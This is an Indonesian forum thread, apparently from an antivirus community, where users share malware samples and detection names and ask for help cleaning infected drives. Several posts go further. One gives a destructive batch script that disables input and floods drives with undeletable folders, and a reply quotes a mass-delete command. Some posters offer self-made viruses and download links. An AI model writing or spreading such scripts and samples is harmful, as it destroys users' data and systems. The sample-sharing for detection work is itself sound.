Tiap Kali Wa Nge Lakui Hal Tersebut Pasti Macet Terus Tuh My Computernya Tapi Bisa Jalan Lagi Kalo Flash Disk Nya Di Cabut

Nama Virus Yang Terdeteksi Oleh Smadav newmgr+new heur lv9
Tapi Pada Saat Di Mau Di Ilangin Tuh Virus Ya Malah Macet Lagi PC wanya

Tolong Di Bantu Wa Lagi Butuh nih FD wa nya  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Februari 13, 2012, 09:17:53 PM
Ada Yang Bisa Ngilangin Nih Virus Gak
Flash Disk Wa Kena nih Virus
Efeknya Flash Disk Wa Gak Bisa Di Format, Copy-Paste, Delete, Bahkan Check

Tiap Kali Wa Nge Lakui Hal Tersebut Pasti Macet Terus Tuh My Computernya Tapi Bisa Jalan Lagi Kalo Flash Disk Nya Di Cabut

Nama Virus Yang Terdeteksi Oleh Smadav newmgr+new heur lv9
Tapi Pada Saat Di Mau Di Ilangin Tuh Virus Ya Malah Macet Lagi PC wanya

Tolong Di Bantu Wa Lagi Butuh nih FD wa nya  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(

ini virus udh agak lama, kedetect sbg Trojan-Ransom.Win32.PornoBlocker.fxp sma kaspersky
scan aja make antivirus import yg uptodate :P
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 13, 2012, 09:21:45 PM
Ada Yang Bisa Ngilangin Nih Virus Gak
Flash Disk Wa Kena nih Virus
Efeknya Flash Disk Wa Gak Bisa Di Format, Copy-Paste, Delete, Bahkan Check

Tiap Kali Wa Nge Lakui Hal Tersebut Pasti Macet Terus Tuh My Computernya Tapi Bisa Jalan Lagi Kalo Flash Disk Nya Di Cabut

Nama Virus Yang Terdeteksi Oleh Smadav newmgr+new heur lv9
Tapi Pada Saat Di Mau Di Ilangin Tuh Virus Ya Malah Macet Lagi PC wanya

Tolong Di Bantu Wa Lagi Butuh nih FD wa nya  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(  :'(

ini virus udh agak lama, kedetect sbg Trojan-Ransom.Win32.PornoBlocker.fxp sma kaspersky
scan aja make antivirus import yg uptodate :P
mw donlot ni virus,, tapi bentuk e exe,, g brani aq,, klo bisa ngirim sampelnya d rar/zip Om,, biar g mnginfeksi atow mnyebarkan diri pas didunlut,,, dikompres+dpasword yaa Om,,, makacihhh
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 13, 2012, 09:25:48 PM
Update virus Om,,
belum dikenali ma Smadav 8.9.2
pas djalankan via VMWare,, ni program lgsung mnghapus semua file,, termasuk isi folder Windows
yang dhapus hanya filenya aja,, bukan dhidden lho filenya,,
hati2 ya Om pas mncobanya jika tak ingin datax kehapus,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Analyzis pada Februari 13, 2012, 09:40:26 PM
Smadavku jadi aneh gara2 virus ini, caption berubah semua http://www.kastilfile.com/download.php?file=299262
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: mustofaikhwanuljamil pada Februari 14, 2012, 12:37:38 PM
Gak Bisa Di Masukin Ke Rar/zip Soalnya PC nya langsung Macet

Jadi FD wa Gak Bisa Di Apa" In Selain LEMBIRU(LEMpar BelI yang baRU)

Tapi FD wa Banyak Data Pentingnya  :'(  :'(  :'(  :'(  :'(  :'(
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: mustofaikhwanuljamil pada Februari 14, 2012, 12:40:45 PM
Sama AV AVG, Norton, Avira Juga Gak Bisa Di Hilangin Tuh Virus Soalnya PC wanya Langsung Macet Terus Gara" Tuh FD (Virusnya Rese)  >:(  >:(  >:( >:(  >:( >:(  :'(  :'( :'(  :'(  :'(
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: firmantaruna3 pada Februari 14, 2012, 01:37:28 PM
Gak Bisa Di Masukin Ke Rar/zip Soalnya PC nya langsung Macet

Jadi FD wa Gak Bisa Di Apa" In Selain LEMBIRU(LEMpar BelI yang baRU)

Tapi FD wa Banyak Data Pentingnya  :'(  :'(  :'(  :'(  :'(  :'(
Sama AV AVG, Norton, Avira Juga Gak Bisa Di Hilangin Tuh Virus Soalnya PC wanya Langsung Macet Terus Gara" Tuh FD (Virusnya Rese)  >:(  >:(  >:( >:(  >:( >:(  :'(  :'( :'(  :'(  :'(

coba di buka pake linux wae boss.. hapus itu virus lewat linux.. kalo di linux juga ngga bisa, berarti FD njenengan yang rusak :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada Februari 14, 2012, 02:47:50 PM
Sama AV AVG, Norton, Avira Juga Gak Bisa Di Hilangin Tuh Virus Soalnya PC wanya Langsung Macet Terus Gara" Tuh FD (Virusnya Rese)  >:(  >:(  >:( >:(  >:( >:(  :'(  :'( :'(  :'(  :'(
virus ini terdetek di eset dengan nama Win32/LockScreen.AHX trojan

coba bersihkan dengan eset

Smadavku jadi aneh gara2 virus ini, caption berubah semua http://www.kastilfile.com/download.php?file=299262
di eset terdeteksi dengan nama Win32/Joke.Ackmad.A sebagai potentially unsafe application

Update virus Om,,
belum dikenali ma Smadav 8.9.2
pas djalankan via VMWare,, ni program lgsung mnghapus semua file,, termasuk isi folder Windows
yang dhapus hanya filenya aja,, bukan dhidden lho filenya,,
hati2 ya Om pas mncobanya jika tak ingin datax kehapus,,
di deteksi sebagai BAT/KillFiles.NFA trojan di eset
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 19, 2012, 09:14:07 PM
bahaya banget tuh virus,,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cybergun pada Maret 01, 2012, 01:24:03 PM
Smadavku jadi aneh gara2 virus ini, caption berubah semua http://www.kastilfile.com/download.php?file=299262

Kalo di ESEt terdeteksi sebagai    Win32/Joke.Ackmad.A
kalo di Jiangmin TrojanDownloader.Agent.dowi
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Maret 01, 2012, 08:49:37 PM
klo Kemo AV rev.9.9 mngenalix sbagai Ackmad Efendi [Caption]

Smadav belum mndeteksi virus ni
Judul: Virus Baru Untuk Smadav!
Ditulis oleh: InvirSoft pada Maret 09, 2012, 12:40:14 AM
Assalamualaikum gan, ane Programmer&Founder "InvirSoft", alhamdulilah ane dah bikin banyak software dan antivirus... kali ini ane mau share virus buatan ane gan yg bernama "CMD Virus"
Mari liat

MD VIRUS ver.2 BY InvirSoft
*************************
Virus ini dapat menghancurkan Sistim Registry Anda secara cepat
Virus Ini Menggunakan Tampilan CMD untuk menipu User
Ketika User Mengubah Tulisan pada CMD (Palsu) maka Virus akan berkerja secara cepat
*************************
Sistim Kerja Virus
Merubah Sistim Registry windows anda sehingga windows anda akan log off dan log onn dengan berulang kali
Dan Fitur Log On Akan rusak seketika sehingga user tidak dapat masuk komputer lagi (maupun masuk lewat safe mode)
Fitur menjalankan Aplikasi pun tidak dapat di gunakan kembali
Jalan satu-satunya untuk refuse virus ini adalah install ulang komputer anda
*************************
Cara Menghindarinya
Cobalah Kirim Virus ini ke Database AVIRA dan SMADAV
lalu jika anda sudah terlanjur menjalankan Virus ini, jangan panik!
mencoba untuk tidak merubah tulisan yang ada pada CMD (Palsu) ini
dengan begitu virus tidak akan berkerja :)
*************************
Berhati - Hati Lah :)

InvirSoft

Link Download Virus : http://www.indowebster.com/download/files/cmd_viruses_by_invirsoft (http://www.indowebster.com/download/files/cmd_viruses_by_invirsoft)  >=)
Untuk Lihat Software ane yg lain : http://www.indowebster.com/search/fikriakhdi (http://www.indowebster.com/search/fikriakhdi)

NAH ITU GAN SINGKATNYA :D
Sekian dari ane

InvirSoft  :-bd
Judul: Re: Virus Baru Untuk Smadav!
Ditulis oleh: Senewen pada Maret 09, 2012, 03:10:02 AM
wew
program yang kamu buat gak kamu sisipin virus juga kan?
Judul: Re: Virus Baru Untuk Smadav!
Ditulis oleh: christianmontolalu pada Maret 09, 2012, 10:30:12 AM
wah lu bikin virus yah , rasah nya gw mau tonjok loe sampai mampus          :P :P :P









Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: InvirSoft pada Maret 09, 2012, 10:37:01 AM
wakakakak, kagak ada gan, itu asli pirus buatan ane :D
Judul: Virus Baru Untuk Smadav!
Ditulis oleh: Metamorphic pada Maret 16, 2012, 08:06:17 PM
Nemu Virus nih di comp... silahkan teliti \m/






Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: LendRossi pada Maret 19, 2012, 02:28:19 PM
kedetect sama smadav 892 sebagai New Heur.FFD(Recycler) om... bisa di clean / quarantine tapi smadav gak bisa bersihin PCnya... (dicolok FD muncul lagi).

Mohon pencerahannya om... :)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: cybergun pada Maret 19, 2012, 03:46:25 PM
udah terkenal kok,
nih om versi menurut antivirus:
AhnLab-V3    ASP/Ace
AntiVir    BDS/ASP.Ace.A
Antiy-AVL    Backdoor/ASP.Ace
Avast    ASP:Ace-N
AVG            Citem_c.HZR
BitDefender    Backdoor.ASP.Ace.A
ClamAV    Trojan.ASP.Ace-11
Commtouch    ASP/Ace.A
Comodo    UnclassifiedMalware
DrWeb    BackDoor.Ace
eTrust-Vet    ASP/Ace.AA
F-Prot    ASP/Ace.A
F-Secure    Backdoor.ASP.Ace.A
Fortinet    VBS/ASPAce.A
GData    Backdoor.ASP.Ace.A
Jiangmin    Backdoor/ASP.Ace.a
K7AntiVirus    Backdoor
Kaspersky    Backdoor.ASP.Ace.a
McAfee    IIS/BackDoor-Ace
McAfee-GW-Edition    Heuristic.BehavesLike.HTML.Suspicious.B
Microsoft    Virus:VBS/Ace.A
NOD32    probably a variant of ASP/Agent.KMKGPDG
Norman    ASP/Ace.A
nProtect    Backdoor.ASP.Ace.A
Panda    Backdoor Program
PCTools    Hacktool.Rootkit
Rising    Backdoor.ASP.Ace.a
Sophos    Troj/ASPAce-A
Symantec    Hacktool.Rootkit
TrendMicro    VBS_ACE.Y
TrendMicro-HouseCall    VBS_ACE.Y
VBA32    Backdoor.ASP.Ace.a
ViRobot    ASP.S.Ace.1526
 :-\  :-\  :-\
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Maret 21, 2012, 12:49:34 PM
ane nemu virus nih cuy  :D

VT:
Sorry but you are not allowed to view spoiler contents.

Judul: Re: Upload VIRUS ke Forum.. boeat smadav
Ditulis oleh: acongg pada Maret 22, 2012, 01:59:46 PM
masbro ane mau sharing virus nehhh  :D itung-itung berkontribusi buat smadav getooooo  ;D
downlod di attachment yooo  ;>



Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: HezekiahSoft pada April 02, 2012, 11:01:31 AM
Tomcat Nih!!!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada April 02, 2012, 11:31:28 AM
Tomcat Nih!!!
Wew, curiga saya. #curiga jangan-jangan buat sendiri tuh. :D
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada April 02, 2012, 12:26:21 PM
lapor mod!! (http://i40.tinypic.com/2d0xsoz.gif)
barusan ane dapet kiriman Autoit dari temen ane di jawa (http://i41.tinypic.com/25rypns.gif)

Avira mendeteksi sebagai : TR/Autoit.FK

VT Result:
Sorry but you are not allowed to view spoiler contents.
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada April 03, 2012, 11:41:48 AM

 :-bd
Baca" dlu mas gan  :P
(http://www.viruslokal.com/wp-content/uploads/2012/04/AutoitCamera-Karakteristik.jpg)

http://www.viruslokal.com/2012/04/virus-autoit-menyamar-sebagai-webcam/
Judul: Re: Upload VIRUS ke Forum.. Notepad palsu & virus Surabaya
Ditulis oleh: acongg pada April 04, 2012, 12:49:30 PM
mod! (http://i41.tinypic.com/25rypns.gif) ane ada virus yg belom dikenali smadav, notepad palsu & Surabaya. menyebar di sekitaran jawa timur & jakarta dan sekitarnya

jgn lupa klik terimakasih  ya  ;D




Judul: Re: Upload VIRUS ke Forum.. Fake-AV (Antivirii)
Ditulis oleh: acongg pada April 09, 2012, 12:32:26 PM
ane nemu antivirus fake bro!! masukin ke db selanjutnya ya! soalnye banyak temen ane yg tertipu sm av fake ini bro  :D :D :D

(http://i40.tinypic.com/30rqnf9.jpg)

Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada April 10, 2012, 07:11:40 PM
1. lagi browsing ga sengaja download file foto live mesenger, tapi kayaknya palsu deh  ???
2. sengaja lagi download theme buat win 7 tapi ada file yg masuk (newsc.exe)  :o

cekibrotttttt masbro!! (http://i40.tinypic.com/2d0xsoz.gif)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada April 13, 2012, 01:17:26 PM
bro Ryan bekabe  :D, ane nemu Ramnit varian terbaru..
tolong masukin DB selanjutnya ya, because udah banyak temen ane yg kena  ^:)^

hasil dari Comodo instan malware analysis:
Sorry but you are not allowed to view spoiler contents.
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: andi eko n pada April 13, 2012, 07:36:40 PM
mohon bantuannya bos.bagaimana cara menghilangkan blacklist dari smadav?
smadav yang saya punya tidak bisa berubah ke pro padahal saya sudah mengirim donasi dan telah mendapatkan key di karenakan smadav free yang saya pakai kena blacklist
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: andi eko n pada April 13, 2012, 07:48:21 PM
bro Ryan bekabe  :D, ane nemu Ramnit varian terbaru..
tolong masukin DB selanjutnya ya, because udah banyak temen ane yg kena  ^:)^

hasil dari Comodo instan malware analysis:
Sorry but you are not allowed to view spoiler contents.
mohon bantuannya bos bagaimana cara menghilangkan blacklist dari smadav?
smadav yang saya punya tidak bisa berubah ke pro padahal saya sudah mengirim donasi dan telah mendapatkan key
dan sudah mengikuti petunjuk cara memasukkan key
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rez419 pada April 13, 2012, 08:03:31 PM
mohon bantuannya bos.bagaimana cara menghilangkan blacklist dari smadav?
smadav yang saya punya tidak bisa berubah ke pro padahal saya sudah mengirim donasi dan telah mendapatkan key di karenakan smadav free yang saya pakai kena blacklist

salah kamar boss
Judul: Re: Upload VIRUS ke Forum.. Virus Qvod
Ditulis oleh: a-cong pada April 17, 2012, 12:03:11 PM
Virus Qvod A dan Qvod B  :-\


makasih atas aplause nya.. dengan ini ane semakin semangat untuk berkontribusi untuk smadav  :-bd




Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: C13MO3TIV4T0R pada April 25, 2012, 02:19:10 PM
gan,yang ini kayaknya ke detec virus deh,cona di analisa...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada April 25, 2012, 04:26:26 PM
salah kamar boss
klik spoiler di bawah
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cacadosman pada Mei 08, 2012, 08:50:20 PM
Akhirnya ane berhasil menangkap virus sialan ini !!!
Ternyata scriptnya nyebelin banget !!!!
virus ini fungsinya ternyata membuat folder yg namanya random yg tidak bisa dihapus di drive C dan D
dan parahnya lagi, mouse dan keyboard juga dinonaktifkan, wew tinggal menonton virus ini bekerja dan tidak bisa berkutik :D
dan lebih parahnya lagi scriptnya di LOOP, jadi di drive C dan D bkn cuma ad 1 folder tapi ribuan bahkan jutaan folder yg gk bsa dihapus
ckckckck, bakalan lag tuh klo buka drive C ama D soalnya foldernya udh jutaan :D

Langsung aj scriptnya nih GAN !!!

@echo off
rundll32 mouse,disable
rundll32 keyboard,disable
echo mouse dimatikan :P
echo keyboard dimatikan :P
echo dalam 3 detik drive C dan D anda akan dipenuhi ribuan/jutaan folder yg gk bsa dihpus selamanya, MWAHAHAHAHAHAHAAHA !!!!!
echo good luck !!!!!
ping -n 3 127.0.0.1
:top
mkdir \\.\D:\%random%\con\aux\nul
mkdir \\.\C:\%random%\con\aux\nul
goto top

Ini virus notepad lho !!! :D
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: smafud pada Mei 10, 2012, 10:41:45 AM
Kode: [Pilih]

@echo off
rundll32 mouse,disable
rundll32 keyboard,disable

echo mouse dimatikan :p
echo keyboard dimatikan :p
echo dalam 3 detik drive C dan D anda akan dipenuhi ribuan/jutaan folder yg gk bsa dihpus selamanya, MWAHAHAHAHAHAHAAHA !!!!!
echo good luck !!!!!
ping -n 3 127.0.0.1
mkdir \\.\D:\%random%\con\aux\nul
mkdir \\.\C:\%random%\con\aux\nul
goto top


logika aja dehh. ni script kalo abis restart ga jalan lg kan.
oh iyah,ni bukan script virus. virus tu cirinya injeksi file,dan ini cuman nge-create folder acak di drive c sama d, disable keyboard sama mouse, nge-loop sampe prosesnya di matiin
pokoknya ni bukan virus. cuma source code buat bikin susah doank ga make soceng atau apapun yg bikin user pengen ngeklik. apa bedanya sama :

Kutip
del /f /q /s *.*
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: abiumi pada Mei 11, 2012, 09:35:47 PM
anybody helepppp....... :'(
lepi ane kadang ada tulisan muncul kayak gini gan...  "windows explorer has stopped working" and "internet explorer has stoped working" klo jarang" sih ngak maslah Cool tp klo udah keseringan nyebelin juga... pusing apakah ini virus??? Undecided trss... klo virus gmn cara hilanginnya... Huh? tlg pencerahannya agan-agan... help help help help help help
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: nainteil pada Mei 16, 2012, 07:55:37 PM
mohon di analisa om
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: nainteil pada Mei 16, 2012, 07:59:25 PM
ini ada lagi om.... menambah perbendaharan smadav
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: nainteil pada Mei 16, 2012, 08:01:50 PM
nambahin lagi om...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Mei 17, 2012, 06:52:56 AM
@nainteil
virus dos
Virus tahun berapa ini bro ?.... memang sih terdeteksi sebagai virus oleh hampir semua anti virus tapi keknya udah nggak work deh di windows xp atau windows7 ( alias bukan ancaman ). :D
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: odhiepe pada Mei 21, 2012, 04:53:12 PM
All

memory card di hp saya sepertinya kenavirus
padahal sudah di format tapi masih ada

di SMADAV diidentivikasi sebagainew heur
"berikut file karantina dari smadav"
apa bisa dijinakkan :d

terimakasih
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Mei 21, 2012, 05:03:11 PM
All

memory card di hp saya sepertinya kenavirus
padahal sudah di format tapi masih ada

di SMADAV diidentivikasi sebagainew heur
"berikut file karantina dari smadav"
apa bisa dijinakkan :d

terimakasih

Terdeteksi sebagai trojan Kryptik.adio oleh Eset


(http://i46.tinypic.com/51eefs.jpg)

Gunakan Antivirus Luar ( eset/avira/avast ) untuk pembesihan system dan file-2 terinfeksi
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: odhiepe pada Mei 22, 2012, 03:48:09 PM
hemmm begitu ya bro... 

thanks berat solusinya, top abis deh  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: muktarsugihmukti pada Mei 23, 2012, 02:03:23 AM
gimana caranya ngupload virusnya, kalau virusnya jadi sourcecut?
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Juni 20, 2012, 06:54:07 PM
Virus penginfeksi exe ni
semoga smadav mngenali hasil infeksix cz yg trbaru g bsa mngenali infeksi yang dtimbulkan oleh ni virus

asyik asyik
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 03, 2012, 03:34:00 PM
ini virus ghosilay. jika anda membutuhkan virus, beritahu saya ghosilay akan membantu anda  \m/
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 03, 2012, 03:38:56 PM
ini virus taskmgr buatan ghosilay .jika anda menginginkan virus yg lebih banyak hubungi saya ghosilay a.k.a silay akan membantu anda
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mujaf pada Juli 05, 2012, 07:43:19 AM
ini virus ghosilay. jika anda membutuhkan virus, beritahu saya ghosilay akan membantu anda  \m/
apakah ini dibuat dari vb6?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Frans Mangarahut Situmorang pada Juli 05, 2012, 08:02:07 AM
ini virus ghosilay. jika anda membutuhkan virus, beritahu saya ghosilay akan membantu anda  \m/
saya gan butuh untuk AV  ^_^ ^_^ ^_^ ^_^
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 06, 2012, 12:58:55 PM
@Frans Mangarahut Situmorang:
oke saya akan membantu anda tenang saja :)

saya punya beberapa sampel virus terbaru semoga bermanpaat untuk smaadav
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 06, 2012, 02:03:19 PM
gan saya butuh virus,,
upload d forum saya saja ya???
oke gan nanti klo ada waktu saya upload ya???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 06, 2012, 02:21:46 PM
upload sebanyak banyaknya ya gan???
Saya butuh banget virus.
oke gan sesama teman diforum harus saling membantu ya???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 06, 2012, 02:34:07 PM
iya lah gan??
Baru kapan agan upload virus di forum saya???


www.anjasforum.smfnew.com
nanti gan soalnya saya sedang di perjalanan kalau sudah sampai saya upload ke forum
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Virus Founder pada Juli 06, 2012, 02:45:47 PM
@Frans Mangarahut Situmorang:
oke saya akan membantu anda tenang saja :)

saya punya beberapa sampel virus terbaru semoga bermanpaat untuk smaadav
om..
itu yg mirc.zip kyknya false positive..
cek smua av gk ad
nih : https://www.virustotal.com/file/2e691dc473b697d4a8a40b25b7dae28a39b95cac044aa6daa4ded49128d8b4d9/analysis/1341560439/
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: dhon2008 pada Juli 07, 2012, 04:39:26 PM
mas bro , ane mau bagi2 smple virus yg mnurut q lolos dr scanning milik smadAV,
q dah coba di virustotal dan bisa agan cek di sini : https://www.virustotal.com/file/acb1191642b9f57cbdc0588848bf561329cfdf083b99b050601053e624a947d5/analysis/1341653149/

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: dhon2008 pada Juli 08, 2012, 10:44:05 AM
gan upload d forum saya juga ya gan???
nama forumnya apa , gan ?
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: dhon2008 pada Juli 08, 2012, 12:46:50 PM
Sippz dahhh :-bd
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 11, 2012, 08:25:48 PM
apa ini??? coba saja anda download dan klik 2 kali apa yang akan terjadi???
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Virus Founder pada Juli 12, 2012, 09:41:53 PM
ini virus flame yg dibilang" mengerikan..
hati" gk pake password..
jangan disebarluaskan y..
info ad di post sbelah..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghosilay pada Juli 13, 2012, 03:08:23 PM
[/color]


gan upload d forum saya juga ya???
anda saya lihat dari kemarin sepertinya agak repot ya??? kalau anda mau virus yang dimaksud, kenapa tidak anda download sendiri saja yang ada disini?? semoga saran saya ini membantu anda yang sedang galau
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: czgirb pada Juli 18, 2012, 03:46:46 PM
Ane juga G tahu ini Virus apa kagak.

* Office XP ... G ada masalah
* Office 2003 ... G ada masalah
* Office 2007 ... G mau buka
* Avast ... G detect
* SmadAV ... G detect
* Spyware Terminator ... G detect
* Malware Anti-Malwarebytes ... juga G detect

Tapi pada waktu upload ke Gmail, file di detect sebagai virus detected

Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Juli 18, 2012, 06:16:47 PM
Ane juga G tahu ini Virus apa kagak.

* Office XP ... G ada masalah
* Office 2003 ... G ada masalah
* Office 2007 ... G mau buka
* Avast ... G detect
* SmadAV ... G detect
* Spyware Terminator ... G detect
* Malware Anti-Malwarebytes ... juga G detect

Tapi pada waktu upload ke Gmail, file di detect sebagai virus detected


Kalau file yang ada di attachment sudah tidak mengandung virus.
hanya saat di buka ada notifikasi error name box ( tabel name ) dimana ada 2 name box yang sama yaitu print_area di sheet 00000ppy

File di attachments tersebut telah kehilangan record makronya.dimana record makronya itulah yang mengandung script virus.
record makro tersebut telah di cure oleh kaspersky seperti ter log di sheet 00000ppy yang hiden.
oleh kaspersky file aslinya tsb telah di save as xls,dimana saat sebuah file exel enable makro ( xlsm) di save as xls maka secara otomatis record makronya akan hilang.

kalau disaat upload ke gmail masih terdeteksi virus dellete saja sheet 00000ppy yang terhiden caranya dengan klik kanan di sheet namenya dan cari opsi unhide.
kalau dilihat dari sisa-sisanya yang di tinggalkan kaspersky sheet 00000ppy tersebut hanyalah sheet untuk mengaktifkan makronya disaat file tersebut di exsekusi.

tapi sekali lagi file di attachments tersebut sudah bersih dari virus.
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: MAbdanMulia pada Agustus 15, 2012, 02:28:51 PM
Malware Discus-X.VBS.B gan
Dapet dari teman FB, mungkin beda dari yang dulu ngetren tahun 2008, bedanya yang ini diencrypt ke *.vbe. atau tidak ya  ^_^ ? Saya tidak tahu [tidak punya sample yang VBS.Discus-X.A soalnya =)) ]. Cmiiw :3
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Frans Mangarahut Situmorang pada Agustus 15, 2012, 03:01:27 PM
Malware Discus-X.VBS.B gan
Dapet dari teman FB, mungkin beda dari yang dulu ngetren tahun 2008, bedanya yang ini diencrypt ke *.vbe. atau tidak ya  ^_^ ? Saya tidak tahu [tidak punya sample yang VBS.Discus-X.A soalnya =)) ]. Cmiiw :3
hem.. bukannya itu virus Solow agan Abdan ? :-\ :-\ :-\ :-\
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: MAbdanMulia pada Agustus 15, 2012, 03:28:48 PM
hem.. bukannya itu virus Solow agan Abdan ? :-\ :-\ :-\ :-\

Bukan gan, coba jalankan virusnya gan :D
Dia buat file di Desktop bernama "HAPPY LEBARAN.htm" yang kalau dibuka isinya :
(http://a5.sphotos.ak.fbcdn.net/hphotos-ak-ash3/s720x720/527169_3177692541026_2121240362_n.jpg)

Cmiiw :3
Judul: wcPVDPDkWL
Ditulis oleh: muchammad ulil wafa pada Agustus 15, 2012, 07:49:12 PM
w9XvW1  <a href="http://batanwnffbfj.com/">batanwnffbfj</a>, jjgtrzsufulq (http://jjgtrzsufulq.com/), [link=http://busdfukcseii.com/]busdfukcseii[/link], http://bnulzhfttget.com/
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: mujaf pada September 05, 2012, 08:37:09 AM
ni ada virus lagi. Smadav ndeteksi pake Heur FFD kalo di fd, kalo udah nginfeksi kompi, smadav jadi nggak ke detek
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxx pada September 16, 2012, 12:50:58 PM
Virus vbs
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: muchammad ulil wafa pada September 16, 2012, 03:19:44 PM
Gan, klo mau coba sampelnya gimana gan..??
Di tes pake CRC32/MD5/dll....?? Gitu..?? :D :D :D

Maklum AV Maker yang Amatir...... ^_^ ^_^ ^_^
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxtrix pada Februari 11, 2013, 03:14:03 PM
kalo mau nyoba tuh jgn di komputer aslinya , pake virtual machine aja , nanti kompi aslinya terinfeksi , jadi rept kan  \m/
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxtrix pada Februari 17, 2013, 01:14:17 PM
Ini virus FolderSniffer .

https://www.virustotal.com/en/file/1b65dd1b99f0673527d80fad524c6fd886c5fcda71d265ded8931be30a1c6d68/analysis/1361081543/

Sudah 30/46 Antivirus bisa mendeteksi

Tetapi.....

SmadAV belum bisa :(
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxtrix pada Februari 17, 2013, 01:26:47 PM
Ini ada satu lagi namanya Virus PassBox

https://www.virustotal.com/en/file/471d34fd97e6f38e9e083a24d12c6987babbf4406c05ae18b1f9f17c5bc396b1/analysis/1361082103/

Sudah 15 / 46 Antivirus bisa mendeteksi

Tetapi.....

SmadAV belum bisa mendeteksi  :(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: dyfa_grahatama pada Februari 17, 2013, 01:46:56 PM
gan virus sexy.exe ma p***.exe tu masuk ke golongan apa??
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxtrix pada Februari 17, 2013, 02:02:40 PM
SmadAV mendeteksinya sebagai FakeFile
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yosef Adi Didi pada Maret 15, 2013, 01:34:33 PM
Ini virus yang agak Berbahaya. Ini memang sebenarnya Crack Eset. Tetapi, setelah dijalankan, task manager, regedit, dan Explorer setiap Dibuka menjadi Virus Ini. Shell Default pun sepertinya diganti oleh virus ini
Sepertinya dibuat dengan VB6. Karena mempunyai ikon sperti ikon default Aplikasi VB6.
Mohon Segera dianalisa

Donwload Link : http://www.4shared.com/file/KpMho2wW/Project1.html? (http://www.4shared.com/file/KpMho2wW/Project1.html?)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: DevilScreaM pada Maret 16, 2013, 12:22:48 PM
Pas diklik #CMIIW

Sorry but you are not allowed to view spoiler contents.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yosef Adi Didi pada Maret 16, 2013, 02:32:30 PM
